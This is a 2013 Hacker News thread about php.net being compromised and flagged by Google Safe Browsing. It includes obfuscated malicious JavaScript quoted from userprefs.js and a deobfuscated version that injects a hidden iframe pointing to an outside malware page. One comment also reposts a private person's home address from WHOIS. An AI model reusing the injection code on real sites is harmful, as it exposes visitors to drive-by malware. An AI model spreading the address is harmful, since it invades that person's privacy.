Hacker News new | past | comments | ask | show | jobs | submit login
Php.net detected as a malware host by Google Safe Browsing (google.com)
176 points by nivla on Oct 24, 2013 | hide | past | favorite | 168 comments

I work at Google and was the one who posted on our forums about this.

What our systems found was definitely a compromised JS file, and others on this thread have posted something similar to what we saw. This is not a false positive.

We have detailed help for webmasters in this kind of situation:


One thing that I strongly suggest to any webmaster in this situation is to look for any server vulnerability that allowed this file to get compromised in the first place. We sometimes see webmasters simply fix the affected files without digging into security hole that allowed the hack, which leaves the server vulnerable for repeat attacks.

Happy to answer questions.

From the dignostics page (http://www.google.com/safebrowsing/diagnostic?site=http://ph...):

>> Malicious software is hosted on 4 domain(s), including cobbcountybankruptcylawyer.com/, stephaniemari.com/, northgadui.com/.

What does this mean? How do these sites relate to php.net?

Probably javascript files planted on php.net are being pulled from servers behind those domains.

php.net allows users to post answers and examples of code throughout the website. Likely, one of the submission forms has/had a hole that allowed someone to submit or alter actual JS code.

This seems like a pretty darn good example of cross-side scripting... and possibly someone not sanitizing inputs?

No, not at all.

Thanks for the information. Can you confirm how long the malware has been on the site for, and if it's possible that people may have been drive-by'd before you flagged the domain? Also what systems did the malware target?


What we can share publicly is at this diagnostics page accessible to anyone (it's linked from the warning page browsers show):


Verified owners in Webmasters Tools get more info.

It's a pity you don't disclose which malware specifically the sites were distributing. As a user who may have been affected prior to google flagging it, it's frustrating to have no information on what to look for.

I think that you should direct your frustration towards the php.net admins and not Google.

It's linked further down the page.

You link seems to indicate that the site isn't suspicious and hasn't served malware in the last 90 days, what changed?

When I go to that page I see: "Of the 1838 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-10-24, and the last time suspicious content was found on this site was on 2013-10-23."


As a student interested in security, will the js file be provided so we can examine and learn how this was done outside of privileged access?


OKay looks like safe browsing said it is no longer suspicious. And I think someone already provided the JS file below.

Google's safe browsing looks pretty cool! Really powerful infrastructure. I wonder if they did this with virustotal? Can virustotal recongize this?

Another thing is other search engines dont seem to have this built-in. I wonder people using DDG will ever think about querying Google safe browsing or not.

Does google provide an api (beside just querying safebrowsing directly).

Here is a pastebin which I found http://pastebin.com/XD0KyLxu

> Does google provide an api (beside just querying safebrowsing directly).


I don't understand: you guys CLEARLY have the information on what, specifically, is causing the problem (which JS file, in this case). Yet for the site owner, you don't make it available? Or if it is, it's not at all easy to find the information. It's just this black box "go figure it out yourself" thing. Meanwhile you've essentially killed access to their site. Or is there something I'm missing?

They have access to details, they posted that userprefs.js was to blame.

But wasn't that only after rasmus posted about it on Twitter? And how would that have worked out for someone not running such a high profile site as him?

No, such information is available to any webmaster who verifies their website ownership in Google's Webmaster Tools.

Once you're a confirmed webmaster for a given site, Google provides you with access to exactly what files are infected on your site. To provide that information publicly would be open the site up to further exploitation.

You sir, get -9,001 Internets.

There are huge repercussions for any website that gets blacklisted with the Stop Badware clearinghouse, the least of which is the inability to figure out exactly where the problem actually is because the company you work for's information for a webmaster to resolve the problem is ridiculously minimal. There are no notifications (unless you are signed up for Google Webmaster Tools) and restoring a website to normal globally can take anywhere from 48 hours to two weeks. There are millions of developers who rely on the PHP website daily for performing their day jobs and you've now made it that much harder for us to do our jobs.

Stop Badware needs a serious overhaul. At the very least, they should contact the contacts in the WHOIS record for the domain BEFORE doing anything. Give the website owners 24 hours to resolve the issue before blacklisting the site. And give them a heck of a lot more information to go on than some vague text.

Also, there are several anti-virus vendors out there who use the clearinghouse database for their products...6 to 12 months after the original blacklisting. So this will happen all over again 6 to 12 months from now. Finding contacts for anti-virus vendors for removing domain blocks is a lot harder than removal from the blacklist on the Stop Badware site.

The CORRECT solution for this situation was to find a contact at PHP who could resolve the issue quickly and amicably. Seriously, how hard is it to locate Rasmus' e-mail address? Always try to find a human contact before using Stop Badware. You can chalk using Stop Badware for the PHP website as being the dumbest decision you've made this year. Hopefully this decision of yours will raise the ire of the Internet just enough to force the company you work for to revamp Stop Badware so it doesn't suck, Google Webmaster Tools so they don't suck, and the reporting tools for sending information to Stop Badware so they also don't suck.

Stop Badware needs a serious overhaul. At the very least, they should contact the contacts in the WHOIS record for the domain BEFORE doing anything.

Why? This isn't a responsible disclosure, "we found a potential vulnerability but we don't know if it's being exploited yet" kind of situation. This is a "there's a real threat to anyone visiting that site via your search engine right now" kind of situation.

As a user, I'd be much happier if the search engine flagged this immediately.

As a site owner, if someone found malware on my site I'd want to know ASAP too. Obviously it would be helpful if they sent me a notification and made the specific details of the identified threat available. However, I could hardly criticise them for blacklisting my site while it should be blacklisted, or for claiming that we were dangerous while we were actually serving malware.

Not clearing up the blacklists promptly after the threat is identified and removed is an entirely different question. If you're going to go around blacklisting sites then I think you also have a responsibility (and, for that matter, you should also have a legal obligation) to remove them from the blacklist with similar efficiency if you're notified that the threat has been removed. Claiming that someone's site is dangerous when it isn't is defamatory, and should be treated as such.

Google is not doing this as a service to the website, they are doing it as a service to the user. Giving the owner some kind of grace period to fix the issue could mean hundreds of thousands of people could get hit with a malicious script in the meantime.

> You sir, get -9,001 Internets.

Cut this shit out, you're not on reddit.

If Google waited 24 hours before blacklisting a site, how many people would be infected during the grace period?

It's incorrect to say that Google doesn't attempt to contact the site owner. According to the Webmaster Tools support site [0], Google will send notices to several common email addresses when it blacklists a site.

[0]: https://support.google.com/webmasters/answer/163633?hl=en#2

> Seriously, how hard is it to locate Rasmus' e-mail address?

Why should google do that ? because it's Rasmus? they dont have to do that period.

The CORRECT SOLUTION is to protect users FIRST and not allow the site to infect more computers.

IT IS NOT google responsability to warn webmasters if their site are infected (though they can be warned by email automatically).

IT IS the webmaster's responsability to audit his website security, which obviously did not happen with php.net. If they get punished for that , that's FAIR , because it will force them to take security more seriously.

[edit] it's hight time people move from httpd to something else like nginx. httpd is insecure by default, this is not how you deal with security. as for PHP, since it doesnt promote any good security practice by default, it should be avoided.

Are you seriously suggesting that Google should not immediately block a website when they detect malware on it... because millions of people are using that site?

I don't understand your suggestion that Google should have waited to protect their users from a site that is serving malware. Why would that be a good idea?

"We know that your child has a bad contagious cold, but don't worry you can still bring him at school for 24 hours and infects other people"

> You sir, get -9,001 Internets.

A million times THIS!

Everybody seems to laugh and rage about this, but could somebody tell me if this is correctly detected or not? I would not be surprised at all if somebody had breached php.net. Did they properly check against intrusions?

It's weird. The file linked to in the google product forums (http://static.php.net/www.php.net/userprefs.js) definitely has a piece of obfuscated js to insert an iframe pointing to http://lnkhere.reviewhdtv.co.uk/stat.htm. The actual http://www.php.net/userprefs.js does not though.

It was changed to un-confuse whatever tool google is using. No version on github has obfuscated contents (see: https://github.com/php/web-php/commits/master/userprefs.js) bit it does include another file (https://github.com/php/web-php/commits/master/functions.js) which did have obfuscated contents. Where the version that inserts iframe to uk site came from?

1) When I go to static userprefs.js on my mobile, no obfuscated contents.

2) Now when I browse to static userprefs.js on my desktop in incognito mode, no obfuscated contents.

3) When i browse to static userprefs.js on normal mode I get the following js appended:

    (function (MH) {
        var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b`\x04\x20-M@O\x00\x0d+\x0c\x0b\x04IM\x00d\x0fhbH"+
            Z7 = ["\x73\x70\x6c\x69\x74", XC = 0x09 * 17, "\x6c\x65\x6e\x67\x74\x68", "\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],
            Jm = "\xd5\xb6\xf9\x89\x9eT\x1a\xe4\x9a\x87\xd3\x16r\xa4\x99}Q\x8c\xc8\xe3t\xf4\xf9\xedC",
            jS = aS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, Jm[Z7[2]]);
        UVf = function (wD) {
            var Np, uK, Ugx = uK = "",
                DUB = 0;
            wD = wD[Z7[0]](Ugx);
            for (Np in wD) {
                if (wD[Z7[3]](Np)) {
                    uK += pVH(wD[Np], jS[Z7[0]](Ugx)[DUB %= jS[Z7[2]]]);
            return (uK);
        jS = UVf(Jm);
    })(window, pVH = function (g6D, FFl, LyS, mnT) {
        g6D = g6D[LyS = "\x63" + (mnT = "\x68\x61\x72\x43\x6f\x64\x65") + "\x41\x74"](0);
        return (String["\x66\x72\x6f\x6d\x43" + mnT](g6D & XC | ((g6D & (~XC & 0xff)) ^ (FFl[LyS](0) & (~XC & 0xff)))))

4) When I control F5 the page to refresh, obfuscated contents are gone.

So I'm leaning towards it being hacked a while ago and the hacked version was in my cache.

This code deobfuscates basically to

        tmp3 = (tmp2 = document.createElement('iframe')).style;
        tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
        tmp1 = (tmp0 = document.createElement('div')).style;
        tmp1.width = tmp1.height = '-10000px';
        tmp1.overflow = 'hidden'; tmp1.position = 'absolute'; tmp1.left = '-10000px';
        tmp4 = document.getElementsByTagName('div');
        tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);
Wrapped into onload.

I really love that part where a random div is selected for inserting the iframe...

If there is one. Could be a little more robust :)

Obviously the hackers have a thing about non-semantic markup :-)

(yes, yes, I know that DIVs aren't really non-semantic - it's a joke)

Would CSP solve this issue? Looks like we could try restricting iframe-src?

But if they are able to hack into the server, I supposed there is nothing to do then...

If php.net used CSP, they would have been able to mitigate this attack with the frame-src directive [1].

[1] http://www.w3.org/TR/CSP/#frame-src

If they are able to hack the physical box (I assume this is how they did the injection), then it is possible for them to modify the CSP rule too.

If my assumption is correct, then CSP won't help unless we separate the source server and the proxy server from each other.

From my experience are these contents only provided once per IP and then you're getting filtered to not get any content again, to prevent 'easy' detection of this.

You simply get blacklisted after the first serving

Yeah, I ran across malware once that only injected JS for visitors from certain referrers, such as Google search. I believe the intention was so that when someone would tell me, "Hey, you have a bunch of weird links on your site" I would go to it directly and not see a problem. IIRC the .htaccess had been modified.

I've seen this sort of thing from the Darkleech apache module[1]. It also won't show the malicious Javascript to any IP that appears in the `last` log. It looks like php.net uses Apache too[2]. The easiest way I've seen to find the module (they come with a variety of names) is to do something like

  strings /path/to/modules/* | grep -i blacklist
[1] http://malwaremustdie.blogspot.com/2013/03/the-evil-came-bac...

[2] http://builtwith.com/php.net

What a mess. I hope running Chrome via EMET is enough to keep my machine safe.

I've noticed that hacks have gone up recently in my little part of cyberspace. Things like Cryptolocker are so profitable that its motivating a lot of talented guys to get into malware and hack servers. Usually servers running some unpatched CMS or module.

Found some more interesting stuff into the rabbit hole:


This is very interesting. Thanks for the code.

The obfuscated code in functions.js in the git repo is very strange, too... What did it do and why was it obfuscated? https://github.com/php/web-php/commit/06a06b561aa2fcf22ce52b...

It's a quick ref of functions for an autocomplete list.

If you have this in your html as the only form:

    <input type="text" id="pattern"/>
    <input type="text" id="show" value="quickref" />
    document.forms[0].pattern = document.getElementById('pattern');
    document.forms[0].show = document.getElementById('show');
then include the functions js you will see an autocomplete list of functions when you type into the pattern box. The lists of function names are stored in a compressed string at the top so it's not really obfuscated, just minified. They shouldn't store it minified though.

That's so weird. Why wouldn't they just use HTTP GZip.

Both files appear identical to me. Which is odd, since there is only 1 CNAME to an address with 1 A record. Perhaps your version of static.php.net is cached by your ISP?

Even with only one public facing address there could be more than one server handling the content. It could be that only one had a bad file, or they all did but that one is yet to be cleaned. Or, as you say, the bad file could be cached at the ISP level (if this was only affected one ISP, whcih obviously it didn't, it could even have been injected at the point rather than at php.net's resources).

Not for me. Both urls have exactly the same content, and nothing suspicious.

Could this be a DNS issue, with a different server serving the bad .js file?

My IP for static.php.net is

Maybe you already visited the site once and received the payload previously?

This comment by a Google employee seems to suggest that it wasn't incorrectly flagged:


Its was definitely hacked .. the log shows that the size of userprefs.js has definitely changed multiple times in the past 25 hrs : http://lerdorf.com/static.log.gz

The site that is linked to in the obfuscated code is http://lnkhere.reviewhdtv.co.uk/stat.htm and it is that site which Google has marked as unsafe. Php.net has received the malware warning as a result.


Notably the whois on that domain includes the registrants full name and address. Nominet allows personal registrants an opt-out on the full details in whois, so you would be unlikely to try and hack PHP.net and forget to use a privacy service on a domain name that isn't quite so traceable..

The domain record for that site show:

  Domain name:
      Oli Bachini
  Registrant type:
      UK Individual
  Registrant's address:
      Rainbow Cottage
      West Perry
      PE28 0BX
      United Kingdom
      Webfusion Ltd t/a 123-reg [Tag = 123-REG]
      URL: http://www.123-reg.co.uk
  Relevant dates:
      Registered on: 13-Oct-2010
      Expiry date:  13-Oct-2014
      Last updated:  06-Oct-2012
  Registration status:
      Registered until expiry date.
  Name servers:
  WHOIS lookup made at 11:44:39 24-Oct-2013

While this is publicly available information, I'm not sure what purpose it serves to post it here as they are quite possibly an innocent bystander.

You are just making them a target for malicious people who would otherwise be too lazy to find that information.

It is pretty bad form to post people's personal addresses on a forum such as this.

Whois data is public in any case, so there's no harm to re-posting it.

>> While this is publicly available information

>> You are just making them a target for malicious people who would otherwise be too lazy to find that information.

I already addressed that.

That site probably was hacked, too.

And this comment probably is too; who can we trust - am I the only one seeing this comment? Will it disappear after reload? WOhaa.


  $ zcat ~/Downloads/static.log.gz |
  perl -lne'if (m/ 200 (\d+)/) { print $1 }'|sort |uniq -c
    390 0
    523 10881
    639 12479
  16276 1279
 178111 2602
      1 4071
     14 4072
     63 4801
    112 4812
   9431 5097
  27654 5821
    110 5911
   1348 6008
    162 7884
    256 8278
    568 9035
   1103 9634
That's a lot of changes

You seem to be counting all the files, not just this one file.

Update: no, you're correct, this log apparently only has one file.

It is a false positive as can be seen here: https://twitter.com/rasmus/status/393258147025932288/photo/1 Bascially it is complaining about a JS file that is actually meant to be there.

What if the JS file itself was replaced?

@icebraining, You're right! The file has indeed been changed a lot lately. In fact as can be seen here: http://lerdorf.com/static.log.gz that file has changed in size from: 2602 bytes to 5821 to 1279 all in the space of 25 hours... that is really suspicious

Not some why they think its false positive ... I know server logs don't lie

Err, often they do. Or more correctly, they often don't show something you think they would if it happened.

Logs show a subset of what has happened. There's no way to prove they are showing everything, so there's no way to use them to prove what did not happen.

Only if you misread the message, Google is saying "the following piece of code injects things", not "this is the exact code that injects things".

I'd say the tool is broken:


It reports google.com for 142 exploit(s), 131 trojan(s), 98 scripting exploit(s)

I'd say you're wrong. Google hosts user-created content that could (and likely did) contain malware at, for example, sites.google.com: http://www.google.com/safebrowsing/diagnostic?site=http://si...

For php.net, it reports only mere 4 trojans. So php.net is almost 100 times safer that google.com, according to this tool. That sounds pretty good :)

> For php.net, it reports only mere 4 trojans. So php.net is almost 100 times safer that google.com, according to this tool. That sounds pretty good :)

Compare how many google.com pages have been tested and how much php.net pages have been tested and stop with that non sense.

You are confident enough in Google's ability to have perfect security on all pages that you think the tool is broken when it says that is not true?

That query probably contains all subpages in google.com, which I imagine have been exploited in some fashion. Google isn't perfect.

There seems to be some controversy here, and one of our research systems found the same problem. So heres a quick post and a link to the full pcap so you can see for yourselves.



Not sure if you're associated with that site, but it's kinda hard to read that article: http://imgur.com/lyeZ9qZ

Windows, Firefox 24.0

ugh, yeah, I'm just a bit associated with it :)

I think our social media coordinator got a little happy with the options. For now disable JS to get a nice read, I'll see about getting that fixed.

EDIT: fixed, looks like last update of WP-Socializer introduced the bug. Disabled for the time being. Thank you and sibling poster for pointing it out.

I'm using Firefox 24 for OS X and the vertical bar with social media buttons floats over the center of that site's content, making it unreadable.

Interesting that satnavreviewed.co.uk, obbcountybankruptcylawyer.com, stephaniemari.com, and northgadui.com are all owned by the same GoDaddy account.

Yeah, presumably the one godaddy account got hijacked, then used as a host for the malicious file.

A good reminder that anyone's low-profile website may not seem a tempting target, but it's still very much at risk.

This is what happens when you give too much power to one company. And what is the appeal process? Asking for help on Twitter as the founder of a huge project like PHP? https://twitter.com/rasmus/status/393258264034422785

This is what happens when you give too much power to one company.

What happens? Is it bad that that Google protects users from malware and notifies webmasters that their website was compromised?

It's very heavy handed. It has not been 100% verified that the site was compromised, and a lot of very technically smart PHP community members are looking hard at this. It may prove to be a false positive or otherwise, but in the meantime:

1. Google is blocking access to the site in Chrome.

2. Firefox is warning users that php.net is not to be trusted (it uses the same list of infected sites provided by Google).

3. Google is warning users on Google Search that "This site may harm your computer.".

4. Google's appeals process is slow and cumbersome.

So yeah, that is a lot of power for one company.

If this happened to your website due to, for example a false positive, you would be pretty unhappy. Only a high profile project like PHP gets this kind of attention, but I'd happily wager that many smaller websites suffer the same faith every day.

This is exactly what happens when your website serves malware. Unhappy about it? Don't serve malware from your website.

When your website serves what Google considers malware, you mean.

And what about the false positive scenario?

A site we once had under development was incorrectly flagged. I reported the error via the webmaster tools and after less than 20 minutes, the warning went away.

I don't know. Any examples? Perhaps, you should ask the victims of such false positives.

If you can find any.

Google doesn't notify anybody, you have to find out for yourself the hard way.

And after that, it forces the owners of the site to register with Google and use Google services just to even figure out why, and to get their sites unflagged. And that is after the owner even figured out how and where to contact Google.

Yes, they do. If you've signed up for Webmaster Tools, you'll get notified by email.

They don't force anyone to sign up. If you do nothing other than fixing your website, eventually Google will check it again and remove from blacklist.

Seriously, what's your complaint? If you don't want to get blacklisted, don't let your site be hacked. If your site is hacked, and you're complaining that Google blacklisted it and notified you about it, you're dumb.

And guess what -- they provide this service (and also pay the real person to review your re-listing request) for FREE.

Google sends out emails to a bunch of different addresses like webmaster@domain.com, abuse@domain.com, etc and notifies anyone signed up through Google Webmaster tools. The only improvement I can think of would be if they notified whoever was listed after doing a WHOIS of the domain but that's a little hard to automate.

>And after that, it forces the owners of the site to register with Google and use Google services just to even figure out why, and to get their sites unflagged.

Google forces you to prove that you own the domain before they give you any information that they don't release publicly. How else do you suggest they go about not releasing everything publicly? Also, all you have to do as a site owner is click on the safe browsing diagnostic link and go from there.

In our case the email alerts went out 12 hours after they identified our site and started giving the warning to users. We got several calls from customers before being notified by Google.

WebMaster Tools really need some improvements - there is no way to re-scan suspected page fast and get more info about the issue. If even Rasmus was unable to get this resolved fast, imagine regular webmasters in the same situation.

Hey, PHP isn't perfect, but calling it malware seems over the top! /rimshot

Thank you, thank you, ladies and gentlemen, I'll be here all week!

ba dum tss

But in all seriousness, php is not the bad guy here, bad coders are.

Are you referring to the people who implemented PHP? Because I would be.


There is not about PHP. Is about blocking an innocent website :)

Innocence has yet to be proven. Right now it's looking like static.php.net might have been compromised.

A site I visit frequently was once identified as containing malware. I overrode it and went there anyway. (In firefox.)

And now forevermore the icon for that site in the url-bar dropdown is the warning icon, and I have not been able to find out how to change it back to the normal one.

Favicion caching is extremely aggressive in Firefox. In the past, visiting the URL of the favicon and pressing Ctrl+F5 was enough. Nowadays, you have clear your cache [1] and then restart your browser.

[1] Tools -> Options -> Advanced -> Network -> Cached Web Content -> Clear Now

Explicitly visit the url of that favicon in the browser and hard reload the page. That usually works for me.

The icon is correct in tabs (and by correct I mean not there - the site has no favicon), it's only incorrect in the url-drop down (the arrow in the url box which shows you the most visited pages).

That's a pretty outdated mirror :)

7 months in "web years" is pretty old, but as you know PHP has been around a long time, so there's still alot of relevant information for those who depend on the site.

Well somebody screwed up here. Maybe PHP core developpers should concentrate on the security of their own website , it's more than embarrassing. There is no reason why php.net should use anything more than a static site generator.

From the headers, php.net seems to be Apache/PHP on BSD. This might be an example of a widespread ongoing attack pattern which is a bit of a mystery.

For the past year or more there have been compromises in this pattern - Linux/unix platform, Apache webserver; foreign Javascript or PHP gets inserted somehow; and/or in some cases the server binary is replaced. Sample article: http://arstechnica.com/security/2013/04/exclusive-ongoing-ma... - you can find more on this.

The big question is how the original exploit happens. It may be a long-out-there 0-day, or some admin tool that the sites have in common, or credentials taken from compromised boxes of developers, or something else.

Edited to update info.

This happened to http://www.iphonedevsdk.com a while ago and did a good job of tarnishing its reputation, all as a result of an arbitrary flag.

Didn't iphonedevsdk.com end up hosting a clientside exploit that got attackers onto the internal networks of Facebook and Twitter?

Serious question: this "arbitrary flag" would possibly be in reference to this widely-reported watering hole attack[1] (or was that attack misreported?), or are you referring to some other issue with that web site?

[1] http://arstechnica.com/security/2013/02/dev-site-behind-appl...

So was the site of the Thai Police with information how to get a police clearance. Very confusing. However, it seems to fixed now.

An update has been posted on this: http://php.net/archive/2013.php#id2013-10-24-1

tl;dr: Relevant services moved to new servers; investigation continuing. Post mortem to follow once that's done.

Ha I live in Cobb County I wonder if that's a good bankruptcy lawyer.

False positives are the life of security. Microsoft Updates (update.microsoft.com) was just blacklisted by malwaredomains this week. It happens. Algorithms are not humans.

This was a true positive.

Malware detectors are usually right if overzealous.

This relates to the website, but maybe there should be malware warnings for programming languages too ;-)

If someone managed to compromise something like the PHP binaries they could cause a lot of damage.

Main php.net site doesn't have binaries, only sources. windows.php.net has Windows binaries, other sites - like Linux distros - have others.

All php releases are signed and checksummed on the d/l page.

I wouldn't imagine anyone downloading php binaries from php.net gives the remotest fig about security so I'm not sure why it would matter.

Hm, so is my Firefox getting this list directly from Google or how does it work?

Yes, Firefox downloads a list of suspicious sites from Google every 30 minutes. It uses the Google Safe Browsing Protocol --


Nitpick: it's a list of hashes of suspicious URLs.

they should already fixed it, the file that they are mentioning, this "userprefs.js" does it is not harmful

Maybe they used PHP to create the site. :)

whats the news from http://php.net/ webmaster???

yup, can we please have some official voice provide a bit of background data here?!

Sure, there are many reasons to dislike PHP. But I wouldn't go as far and call it a malware.

still funny ;)

if so, that means facebook is also a malware :D

facebook hardly uses the PHP interpretor,they have their own PHP VM , HHVM.

Considering the compromise was a js script and most likely had nothing to do with PHP, both these comments are not relevant.

According to Twitter post by Rasmus (https://twitter.com/rasmus/status/393258264034422785) this has been like this for at least 1 day and still has not been fixed. Something tells me that Google has way too much power and the fact that they don't sort out false positives in a timely fashion is really bad.

PHP webmasters didn't fix the issue and you're complaining about Google?

According to one of the people responsible for a software project that has been plagued by security holes for ~15 years, and whose website was hacked, and who hasn't fixed it...

Yeah, that's definitely a problem with google alright. Just because the entire PHP team disregards security completely, doesn't mean the consequences of that are google's problem. The fact that they just assume it is a false positive and don't even bother to verify their hacked site is incredible.

it is not surprised

why? see sources of project php.net for this site

Yeah, what gives?

Honestly, I feel like there is nerd rage here; php.net should in no way ever be flagged as malware. Clearly a failure in Google here.

Not sure if you're joking or lacking knowledge. Just because it's the official PHP site does absolutey NOT mean it cannot contain malware. Legitimate sites are compromised and used to spread malware all the damn time.

But in this case it looks like Google tool found legit, but obfuscated file, which was loaded in some tricky way that bad sites usually use, and decided it's a malware.

mysql.com was hacked by a sql injection [0]. microsoft.com had XSS vulnerabilities a while back that allowed auth token harvesting via an overly generous cookie paths [1].

Any website in the world has the potential to be flagged as serving malware.

[0] http://www.pcworld.com/article/240609/mysqlcom_hacked_to_ser... [1] http://www.marw0rm.com/xss-flaw-on-office-microsoft-com-disc... etc

One reason I migrated away from php is the fact that there is simply way too many attack vectors. Using frameworks help quite a bit, but it is to easy to miss configure a stock php install. Not saying that is the case here though.

we have no proofs that is related with the fact that the domain has been blacklisted by google

It's "tagged" by Google. When I search php from the iPhone I get:

"PHP: Hypertext Preprocessor


This site may harm your computer.

Server-side HTML embedded scripting language. It provides web developers with a full suite of tools for ..."

Google inserts the "harm" note.

Yes, but there are quite a few ways to get flagged by Google.

You are correct. Like I said, I doubt that is the case. Php can be very secure if configured correctly.

that's the issue, PHP should be secure(ie restrictive) by default, Linux style... it is not. PHP+Apache => recipe for disaster. PHP is a templating language yet doesnt do html sanitizing by default !

95% of compromised websites are PHP ones.

That's the reason why PHP will die eventually,when businesses understand while it's cheap to go online with a PHP cms, once you get hacked , it will cost you your business.

you do realize that this is a javascript exploit? just sayin.

You'd have to be pretty stupid to think this is exploting some sort of PHP bug.

OMG! Did I just defend PHP? Gotta go take my medication.

Yes. It was more of a general statement.

and how did the js exploit end up on their servers? through php code likely.

That's speculation. I've seen servers get compromised due to FTP problems, SSH misconfiguration, unpatched Apache vulnerabilities, third-party stats monitoring software with 0-days and even SQL injection.

Defacement (I consider malware injection a form of defacement) isn't unique to PHP by a long shot.

This is ridiculous speculation on your part, you can't speculate with security, for all you know the webmaster's ex-girlfriend could have inserted the malware.

and you now using sql-prepare-query instructions after escape from php?

Using Django ORM. if you haven't used an ORM before you are missing out.

... you know PHP's supported PDO for a while now, right?

when many attacks are occurs it is going more interesting...

curious what you are using now?

Currently using Django. Once I started playing around with it I haven't looked back. Although I am told cake php and a few other frameworks really do improve php.

they dont improve PHP. you still have to deal with PHP shortcomings even with a framework. But since you dont deal with low level stuffs your code might be more secure yeah.

PHP has too many unsecure apis accessible to beginners.

With Django for instance you have a view layer with auto escaping by default.You dont write unsecure SQL queries ,..., That makes a huge difference.

I'm tempted to say: they improve programmers.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact